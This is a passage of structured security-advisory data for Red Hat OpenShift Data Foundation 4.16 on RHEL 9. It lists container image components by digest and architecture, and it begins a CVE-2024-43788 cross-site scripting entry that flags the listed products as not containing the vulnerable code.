"odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", }, product_reference: "odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", }, product_reference: "odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", }, product_reference: "odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", }, product_reference: "odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", }, product_reference: "odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", }, product_reference: "odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", }, product_reference: "odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", }, product_reference: "odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", }, product_reference: "odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", }, product_reference: "odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", }, product_reference: "odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", }, product_reference: "odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", }, product_reference: "odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", }, product_reference: "odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", }, product_reference: "odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", }, product_reference: "odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", }, product_reference: "odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", }, product_reference: "odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", }, product_reference: "odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", }, product_reference: "odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", }, product_reference: "odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", }, product_reference: "odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", }, product_reference: "odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", }, product_reference: "odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", }, product_reference: "odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", }, product_reference: "odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", }, product_reference: "odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", }, product_reference: "odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", }, product_reference: "odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", }, product_reference: "odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, ], }, vulnerabilities: [ { cve: "CVE-2024-43788", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-08-27T17:20:06.890123+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", 